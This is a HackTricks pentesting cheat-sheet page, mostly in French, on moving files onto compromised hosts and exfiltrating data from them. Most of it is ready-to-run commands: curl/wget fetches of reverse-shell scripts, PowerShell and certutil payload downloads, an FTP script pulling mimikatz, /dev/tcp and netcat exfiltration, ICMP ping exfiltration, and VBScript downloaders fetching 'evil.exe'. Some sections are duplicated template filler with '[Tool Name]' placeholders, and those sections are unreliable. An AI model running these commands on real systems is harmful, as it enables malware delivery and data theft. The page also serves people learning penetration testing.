Exfiltration

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!

Autres façons de soutenir HackTricks :

Si vous voulez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT !
Obtenez le swag officiel PEASS & HackTricks
Découvrez La famille PEASS, notre collection exclusive de NFT
Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez-nous sur Twitter 🐦 @hacktricks_live.
Partagez vos astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud github repos.

Groupe de sécurité Try Hard

Join the Try Hard Security Discord Server!Discord

Domaines couramment autorisés pour exfiltrer des informations

Consultez https://lots-project.com/ pour trouver des domaines couramment autorisés qui peuvent être abusés

Copier&Coller Base64

Linux

base64 -w0 <file> #Encode file
base64 -d file #Decode file

Windows

certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dll

HTTP

Linux

wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
fetch 10.10.14.14:8000/shell.py #FreeBSD

Windows

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf

#PS
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"

Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
#OR
Start-BitsTransfer -Source $url -Destination $output -Asynchronous

Téléverser des fichiers

# Listen to files
python3 -m pip install --user uploadserver
python3 -m uploadserver
# With basic auth:
# python3 -m uploadserver --basic-auth hello:world

# Send a file
curl -X POST http://HOST/upload -H -F 'files=@file.txt'
# With basic auth:
# curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world

Serveur HTTPS

# from https://gist.github.com/dergachev/7028596
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
#    openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
#    python simple-https-server.py
# then in your browser, visit:
#    https://localhost:443

### PYTHON 2
import BaseHTTPServer, SimpleHTTPServer
import ssl

httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
httpd.serve_forever()
###

### PYTHON3
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl

httpd = HTTPServer(('0.0.0.0', 443), BaseHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="./server.pem", server_side=True)
httpd.serve_forever()
###

### USING FLASK
from flask import Flask, redirect, request
from urllib.parse import quote
app = Flask(__name__)
@app.route('/')
def root():
print(request.get_json())
return "OK"
if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
###

FTP

Serveur FTP (python)

pip3 install pyftpdlib
python3 -m pyftpdlib -p 21

Serveur FTP (NodeJS)

sudo npm install -g ftp-srv --save
ftp-srv ftp://0.0.0.0:9876 --root /tmp

Serveur FTP (pure-ftp)

apt-get update && apt-get install pure-ftp

#Run the following script to configure the FTP server
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pwd useradd fusr -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart

Client Windows

#Work well with python. With pure-ftp use fusr:ftp
echo open 10.11.0.41 21 > ftp.txt
echo USER anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo bin >> ftp.txt
echo GET mimikatz.exe >> ftp.txt
echo bye >> ftp.txt
ftp -n -v -s:ftp.txt

SMB

Kali en tant que serveur

kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
#For new Win10 versions
impacket-smbserver -smb2support -user test -password test test `pwd`

Ou créez un partage smb en utilisant samba:

apt-get install samba
mkdir /tmp/smb
chmod 777 /tmp/smb
#Add to the end of /etc/samba/smb.conf this:
[public]
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = Yes
#Start samba
service smbd restart

Exfiltration

Techniques

Exfiltration Over Command and Control Channel

Description: Data exfiltration can be achieved by sending commands to the compromised system to exfiltrate data over the command and control channel.
Detection: Monitor network traffic for suspicious commands or data transfers over the command and control channel.

Exfiltration Over Alternative Protocol

Description: Data exfiltration can be achieved by using alternative protocols such as DNS, ICMP, or HTTPS to bypass network security controls.
Detection: Monitor network traffic for unusual patterns or data transfers over non-standard protocols.

Tools

[Tool Name]: Description of the tool and how it can be used for data exfiltration.
[Tool Name]: Description of the tool and how it can be used for data exfiltration.

Countermeasures

Implement network segmentation to restrict communication between different parts of the network.
Use encryption to protect data in transit and prevent unauthorized access to exfiltrated data.

Exfiltration

Techniques

Exfiltration Over Command and Control Channel

Description: Data exfiltration can be achieved by sending commands to the compromised system to exfiltrate data over the command and control channel.
Detection: Monitor network traffic for suspicious commands or data transfers over the command and control channel.

Exfiltration Over Alternative Protocol

Description: Data exfiltration can be achieved by using alternative protocols such as DNS, ICMP, or HTTPS to bypass network security controls.
Detection: Monitor network traffic for unusual patterns or data transfers over non-standard protocols.

Tools

[Tool Name]: Description of the tool and how it can be used for data exfiltration.
[Tool Name]: Description of the tool and how it can be used for data exfiltration.

Countermeasures

Implement network segmentation to restrict communication between different parts of the network.
Use encryption to protect data in transit and prevent unauthorized access to exfiltrated data.

CMD-Wind> \\10.10.14.14\path\to\exe
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials

WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
WindPS-2> cd new_disk:

SCP

L'attaquant doit avoir SSHd en cours d'exécution.

scp <username>@<Attacker_IP>:<directory>/<filename>

SSHFS

Si la victime a SSH, l'attaquant peut monter un répertoire de la victime vers l'attaquant.

sudo apt-get install sshfs
sudo mkdir /mnt/sshfs
sudo sshfs -o allow_other,default_permissions <Target username>@<Target IP address>:<Full path to folder>/ /mnt/sshfs/

NC

Description

Netcat (nc) is a versatile networking tool that can be used for various purposes, including exfiltration of data. It allows for creating connections to remote hosts, listening on ports, and transferring data between systems. Netcat can be used to exfiltrate data over the network in a stealthy manner.

Methodology

Basic Usage: Netcat can be used to transfer files between systems by setting up a listener on the receiving end and connecting to it from the sending end.
Reverse Shells: Netcat can be used to create reverse shells, allowing an attacker to gain remote access to a system and exfiltrate data.
Port Scanning: Netcat can also be used for port scanning to identify open ports on a target system, which can then be used for exfiltration.
Encryption: To secure data during exfiltration, Netcat can be used in combination with encryption tools like OpenSSL to encrypt the data before transmission.

Prevention

Firewall Rules: Implement strict firewall rules to restrict the usage of Netcat on systems to prevent unauthorized data exfiltration.
Network Monitoring: Monitor network traffic for any suspicious activities or the use of Netcat to exfiltrate data.
File Integrity Monitoring: Implement file integrity monitoring to detect any unauthorized file transfers using Netcat.
User Training: Provide security awareness training to users to educate them about the risks associated with tools like Netcat and how to prevent data exfiltration.

nc -lvnp 4444 > new_file
nc -vn <IP> 4444 < exfil_file

/dev/tcp

Télécharger un fichier depuis la victime

nc -lvnp 80 > file #Inside attacker
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim

Téléverser un fichier à la victime

nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
# Inside victim
exec 6< /dev/tcp/10.10.10.10/4444
cat <&6 > file.txt

Merci à @BinaryShadow_

ICMP

# To exfiltrate the content of a file via pings you can do:
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
#This will 4bytes per ping packet (you could probably increase this until 16)

from scapy.all import *
#This is ippsec receiver created in the HTB machine Mischief
def process_packet(pkt):
if pkt.haslayer(ICMP):
if pkt[ICMP].type == 0:
data = pkt[ICMP].load[-4:] #Read the 4bytes interesting
print(f"{data.decode('utf-8')}", flush=True, end="")

sniff(iface="tun0", prn=process_packet)

SMTP

Si vous pouvez envoyer des données à un serveur SMTP, vous pouvez créer un SMTP pour recevoir les données avec python:

sudo python -m smtpd -n -c DebuggingServer :25

TFTP

Par défaut dans XP et 2003 (dans d'autres, il doit être ajouté explicitement lors de l'installation)

Dans Kali, démarrer le serveur TFTP:

#I didn't get this options working and I prefer the python option
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /path/tp/nc.exe /tftp

Serveur TFTP en python :

pip install ptftpd
ptftpd -p 69 tap0 . # ptftp -p <PORT> <IFACE> <FOLDER>

Dans victime, connectez-vous au serveur Kali :

tftp -i <KALI-IP> get nc.exe

PHP

Téléchargez un fichier avec un oneliner PHP :

echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php

VBScript

Introduction

VBScript (Visual Basic Scripting Edition) is a scripting language developed by Microsoft. It is commonly used for writing scripts to automate tasks on Windows operating systems.

Exfiltration Techniques

VBScript can be used for exfiltrating data from a compromised system. Below are some techniques that can be used:

Writing to Files: VBScript can be used to write data to files on the system, which can then be exfiltrated by the attacker.
Sending Emails: VBScript can also be used to send emails with the exfiltrated data as attachments or within the email body.
HTTP Requests: VBScript can make HTTP requests to a remote server controlled by the attacker, sending the exfiltrated data in the request body.

Example

Below is an example of VBScript code that exfiltrates data by sending an HTTP request:

Dim objXMLHTTP
Set objXMLHTTP = CreateObject("MSXML2.ServerXMLHTTP")
objXMLHTTP.Open "POST", "http://attacker-server.com/exfiltrate", False
objXMLHTTP.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
objXMLHTTP.send "data=exfiltrated_data"

In this example, the VBScript code creates an HTTP POST request to "http://attacker-server.com/exfiltrate" with the exfiltrated data in the request body.

Mitigation

To mitigate the risk of exfiltration using VBScript, organizations should restrict the use of VBScript on their systems and monitor for any suspicious VBScript activities. Regular security training for employees can also help in preventing attackers from using VBScript for exfiltration.

Attacker> python -m SimpleHTTPServer 80

Victime

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http =CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

cscript wget.vbs http://10.11.0.5/evil.exe evil.exe

Debug.exe

Le programme debug.exe permet non seulement l'inspection des binaires, mais a également la capacité de les reconstruire à partir de l'hexadécimal. Cela signifie qu'en fournissant un hexadécimal d'un binaire, debug.exe peut générer le fichier binaire. Cependant, il est important de noter que debug.exe a une limite d'assemblage de fichiers jusqu'à 64 ko en taille.

# Reduce the size
upx -9 nc.exe
wine exe2bat.exe nc.exe nc.txt

Ensuite, copiez-collez le texte dans le shell Windows et un fichier appelé nc.exe sera créé.

https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html

DNS

https://github.com/62726164/dns-exfil

Try Hard Security Group

Join the Try Hard Security Discord Server!Discord

Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres façons de soutenir HackTricks:

Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT!
Obtenez le swag officiel PEASS & HackTricks
Découvrez The PEASS Family, notre collection exclusive de NFTs
Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez-nous sur Twitter 🐦 @hacktricks_live.
Partagez vos astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud github repos.

PreviousBasic Python NextTunneling and Port Forwarding

Last updated 7 months ago